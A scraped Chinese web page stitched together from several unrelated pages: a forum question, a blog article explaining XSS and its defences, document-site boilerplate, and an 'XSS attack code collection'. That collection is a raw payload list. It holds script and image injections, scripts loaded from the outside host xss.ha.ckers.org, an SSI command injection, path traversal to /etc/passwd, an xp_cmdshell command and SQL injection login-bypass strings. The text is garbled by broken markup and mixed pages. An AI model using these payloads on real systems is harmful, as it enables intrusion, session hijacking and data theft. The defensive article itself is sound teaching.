现在玩什么bug好。防止xss跨站脚本攻击击xss我玩过了 ,万能密码玩过了。好像没什么好玩的。一定要好玩。

当前位置:
时间: 12:36:45
发布:宿迁波仔博客 | 分类:经验心得 | 评论:9 | 浏览:
热门文章排行:
具体是在什么文件进行修改呢?
Post: 11:45:29
Post: 11:44:32
一直以来支持
Post: 14:28:39
Post: 17:06:03
怎么修改啊,一头雾水。
Post: 21:17:18
有时间我想测试一下
Post: 10:09:53
这个方法不错,学习一下
Post: 11:52:59
唉,现在的黑客要在网站上挂东西方法很多,防护措施必须做好才行
Post: 8:14:29
识别,过滤是程序员必备的安全知识
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
【相关文章】 9:36:50 11:15:57 20:12:7 22:6:11 21:57:53 13:42:43 9:45:38 9:18:7 21:32:18 11:34:27
关注宿迁波仔
本月最热文章
本年最热文章XSS跨站脚本攻击原理及防护方法
概念:XSS(Cross
Site Script)跨站脚本攻击。它指的是恶意攻击者往Web 页面里插入恶意html 代码,当用户浏览该页之时,嵌入其中Web 里面的html
代码会被执行,从而达到恶意用户的特殊目的。本文介绍了该攻击方式,并给出了一些防范措施。
原理:XSS 属于被动式的攻击。攻击者先构造一个跨站页面,利用script、&IMG&、
&IFRAME&等各种方式使得用户浏览这个页面时,触发对被攻击站点的http
请求。此时,如果被攻击者如果已经在被攻击站点登录,就会持有该站点cookie。这样该站点会认为被攻击者发起了一个http
请求。而实际上这个请求是在被攻击者不知情的情况下发起的,由此攻击者在一定程度上达到了冒充被攻击者的目的。精心的构造这个攻击请求,可以达到冒充发文,夺取权限等等多个攻击目的。在常见的攻击实例中,这个请求是通过script 来发起的,因此被称为Cross Site Script。攻击Yahoo Mail 的Yamanner 蠕虫是一个著名的XSS 攻击实例。Yahoo
Mail 系统有一个漏洞,当用户在web 上察看信件时,有可能执行到信件内的javascript 代码。病毒可以利用这个漏洞使被攻击用户运行病毒的script。同时Yahoo Mail 系统使用了Ajax技术,这样病毒的script 可以很容易的向Yahoo Mail 系统发起ajax 请求,从而得到用户的地址簿,并发送病毒给他人。
攻击主要分为两类:
一类是来自内部的攻击,主要指的是利用WEB
程序自身的漏洞,提交特殊的字符串,从而使得跨站页面直接存在于被攻击站点上,这个字符串被称为跨站语句。这一类攻击所利用的漏洞非常类似于SQL Injection 漏洞,都是WEB程序没有对用户输入作充分的检查和过滤。上文的Yamanner 就是一例。
另一类则是来来自外部的攻击,主要指的自己构造XSS
跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个跨站网页放在自己的服务器上,然后通过结合其它技术,如社会工程学等,欺骗目标服务器的管理员打开。这一类攻击的威胁相对较低,至少ajax 要发起跨站调用是非常困难的。
先总结一下常见的攻击手法:
1. 依赖跨站漏洞,需要在被攻击网站的页面种入脚本的手法
1.1. Cookie 盗取,通过javascript 获取被攻击网站种下的cookie,并发送给攻击者。
1.1.1. 从cookie
中提取密码等隐私
1.1.2. 利用cookie
伪造session,发起重放攻击
1.2. Ajex 信息盗取,通过javascript 发起ajex 请求。
1.2.1. 从ajex
结果中获取隐私。
1.2.2. 模拟用户完成多页表单。
2. 不依赖跨站漏洞的手法,搜狐公司研发中心版权所有,仅供技术交流,转载请保留上述文字
2.1. 单向HTTP
动作,通过img.src
等方法发起跨站访问,冒充被攻击者执行特权操作。但是很难拿到服务器的返回值。
2.2. 双向HTTP
动作,如果服务器产生一段动态的script,那么可以用script.src 的方法发起跨站访问并拿到服务器的返回值。防范手法如下:
防堵跨站漏洞,阻止攻击者利用在被攻击网站上发布跨站攻击语句不可以信任用户提交的任何内容,首先代码里对用户输入的地方和变量都需要仔细检查长度和对”&”,”&”,”;”,”’”等字符做过滤;其次任何内容写到页面之前都必须加以encode,避免不小心把html tag 弄出来。这一个层面做好,至少可以堵住超过一半的XSS 攻击。
2. Cookie 防盗首先,避免直接在cookie 中泄露用户隐私,例如email、密码等等。
其次,通过使cookie 和系统ip 绑定来降低cookie 泄露后的危险。这样攻击者得到的cookie 没有实际价值,不可能拿来重放。
3. 尽量采用POST
而非GET 提交表单
POST 操作不可能绕开javascript 的使用,这会给攻击者增加难度,减少可利用的跨站漏洞。
4. 严格检查refer检查http refer 是否来自预料中的url。这可以阻止第2 类攻击手法发起的http 请求,也能防止大部分第1 类攻击手法,除非正好在特权操作的引用页上种了跨站访问。
5. 将单步流程改为多步,在多步流程中引入效验码多步流程中每一步都产生一个验证码作为hidden 表单元素嵌在中间页面,下一步操作时这个验证码被提交到服务器,服务器检查这个验证码是否匹配。首先这为第1
类攻击者大大增加了麻烦。其次攻击者必须在多步流程中拿到上一步产生的效验码才有可能发起下一步请求,这在第2 类攻击中是几乎无法做到的。
6. 引入用户交互简单的一个看图识数可以堵住几乎所有的非预期特权操作。
7. 只在允许anonymous
访问的地方使用动态的javascript。
8. 对于用户提交信息的中的img
等link,检查是否有重定向回本站、不是真的图片等可疑操作。
内部管理网站的问题很多时候,内部管理网站往往疏于关注安全问题,只是简单的限制访问来源。这种网站往往对XSS 攻击毫无抵抗力,需要多加注意。安全问题需要长期的关注,从来不是一锤子买卖。XSS
攻击相对其他攻击手段更加隐蔽和多变,和业务流程、代码实现都有关系,不存在什么一劳永逸的解决方案。此外,面对XSS,往往要牺牲产品的便利性才能保证完全的安全,如何在安全和便利之间平衡也是一件需要考虑的事情。
已投稿到:
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。 上传我的文档
 下载
 收藏
该文档贡献者很忙,什么也没留下。
 下载此文档
XSS跨站脚本攻击 论 文
下载积分:1000
内容提示:XSS跨站脚本攻击 论 文
文档格式:DOC|
浏览次数:55|
上传日期: 15:06:56|
文档星级:
全文阅读已结束,如果下载本文需要使用
 1000 积分
下载此文档
该用户还上传了这些文档
XSS跨站脚本攻击 论 文
官方公共微信xss跨站脚本攻击代码大全_黑客技术
记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华
&p& ‘& &script&alert(document.cookie) &/script& &br /& =’& &script&alert(document.cookie) &/script& &br /&
&script&alert(document.cookie) &/script& &br /&
&script&alert(vulnerable) &/script& &br /& %3Cscript%3Ealert(‘XSS’)%3C/script%3E&br /&
&script&alert(‘XSS’) &/script& &br /& &img src=&”javascript:alert(‘XSS’)”& alt=&& /&&br /& %0a%0a &script&alert(”Vulnerable”) &/script& .jsp&br /& %22%3cscript%3ealert(%22xss%22)%3c/script%3e&br /& %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&br /& %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini&br /& %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e&br /& %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e&br /& %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html&br /& %3f.jsp&br /& %3f.jsp&br /&
&script&alert(‘Vulnerable’); &/script& &br /&
&script&alert(‘Vulnerable’) &/script& &br /& ?sql_debug=1&br /& a%5c.aspx&br /& a.jsp/ &script&alert(‘Vulnerable’) &/script& &br /& a/&br /& a? &script&alert(‘Vulnerable’) &/script& &br /& “& &script&alert(‘Vulnerable’) &/script& &br /& ‘;exec%20master..xp_cmdshell%20′dir%20 c:%20&%20c:inetpubwwwroot?.txt’–&&&br /& %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&br /& %3Cscript%3Ealert(document. domain);%3C/script%3E&&br /& %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=&br /& 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=&/p&&p& ////etc/passwd&/p&&p& ................windowssystem.ini&br /& ................windowssystem.ini&br /& ”;!–”&xss&=&{()}&br /& &img src=&”javascript:alert(‘XSS’);”& alt=&& /&&br /& &img src=&javascript:alert(‘XSS’)& alt=&& /&&br /& &img src=&JaVaScRiPt:alert(‘XSS’)& alt=&& /&&br /& &img src=&JaVaScRiPt:alert(“XSS”)& alt=&& /&&br /& &img src=&javascript:alert(‘XSS’)& alt=&& /&&br /& &img src=&javascript:alert(‘XSS’)& alt=&& /&&br /& &IMG src=javascript:alert('&br /& 8SS')&&br /& &img src=&”jav& ascript:alert=&& xss=&& alt=&& /&&br /& &img src=&”jav& ascript:alert=&& xss=&& alt=&& /&&br /& &img src=&”jav& ascript:alert=&& xss=&& alt=&& /&&br /& “&img src=&java?script:alert(”XSS”)& alt=&& /&”;’ & out&br /& &img src=&”& javascript:alert=&& xss=&& alt=&& /&&br /&
&script&a=/XSS/alert(a.source) &/script& &br /& &br /& &br /& &img dynsrc=&”javascript:alert(‘XSS’)”& alt=&& /&&br /& &img lowsrc=&”javascript:alert(‘XSS’)”& alt=&& /&&br /& &bgsound src=&”javascript:alert(‘XSS’);”&&&/bgsound&&br /& &br size=&”&{alert(‘XSS’)}”& /& &br /& &layer src=&”http://xss.ha.ckers.org/a.js”&&&/layer&&br /& &link rel=&”stylesheet”& href=&”javascript:alert(‘XSS’);”& /&&br /& &img src=&’vbscript:msgbox(“XSS”)’& alt=&& /&&br /& &img src=&”mocha:[code]'&&br& img=&& br=&& iframe=&& frameset=&& frame=&& table=&& background=&javascript:alert('XSS')& div=&& style=&background-image: url(javascript:alert('XSS'))& import=&& javascript:alert=&& xss=&& type=&text/javascript& alert=&& background-image:url=&& a=&& body=&& background:url=&& base=&& href=&”mocha:[code]'&&br& geturl=&& b=&URL& c=&javascript:& d=&alert('XSS');& eval=&& alt=&& /&& &script&function a(){alert('XSS');} &/script& &&&br /&
&script src=&http://xss.ha.ckers.org/xss.jpg&& &/script& &br /& &IMG src=&javascript:alert('XSS')&&br /& &!--#exec cmd=&/bin/echo '&SCRIPT SRC'&--&&!--#exec cmd=&/bin/echo '=http://xss.ha.ckers.org/a.js&'&--&&br /& &img src=&/somecommand.php?somevariables=maliciouscode& alt=&& /&&br /&
&script a=&&& src=&http://xss.ha.ckers.org/a.js&& &/script& &br /&
&script src=&http://xss.ha.ckers.org/a.js&& &/script& &br /&
&script a=&&& src=&http://xss.ha.ckers.org/a.js&& &/script& &br /&
&script a=&&& src=&http://xss.ha.ckers.org/a.js&& &/script& &br /&
&script&document.write(&&SCRI&); &/script& PT src=&http://xss.ha.ckers.org/a.js&&&br /& &a href=&http://www.go//&&link&/a&&br /& admin'--&br /& ' or 0=0 --&br /& & or 0=0 --&br /& or 0=0 --&br /& ' or 0=0 #&br /& & or 0=0 #&br /& or 0=0 #&br /& ' or 'x'='x&br /& & or &x&=&x&br /& ') or ('x'='x&br /& ' or 1=1--&br /& & or 1=1--&br /& or 1=1--&br /& ' or a=a--&br /& & or &a&=&a&br /& ') or ('a'='a&br /& &) or (&a&=&a&br /& hi& or &a&=&a&br /& hi& or 1=1 --&br /& hi' or 1=1 --&br /& hi' or 'a'='a&br /& hi') or ('a'='a&br /& hi&) or (&a&=&a[/code]&/xss&&/p&&p& 推荐工具:&strong&Xelenium是由owasp出品的一款安全测试&strong&工具&/strong&,使用Java Swing编写,可以用来发现web应用中存在的安全漏洞。&/strong&&/p&--&
阅读:159688 | 评论:0 | 标签:
想收藏或者和大家分享这篇好文章→
?微信扫一扫,快速掌握黑客技术?PHP跨站脚本攻击(XSS)漏洞修复方法(一) | 张戈博客
博客宗旨 把最实用的经验,分享给最需要的读者,希望每一位来访的朋友都能有所收获!
<span class="tipso_style" id="tip-w" data-tipso=''>
浏览 7622705 次
留言 17110 条
随便挑了些,看你喜欢嘛
关于博客 张戈博客是关注互联网以及分享IT运维工作经验的个人博客,主要涵盖了操作系统运维、实用脚本编程以及博客网站建设等经验教程。我的博客宗旨:把最实用的经验,分享给最需要的读者,希望每一位来访的朋友都能有所收获!

我要回帖

更多关于 xss跨站脚本攻击漏洞 的文章

 

随机推荐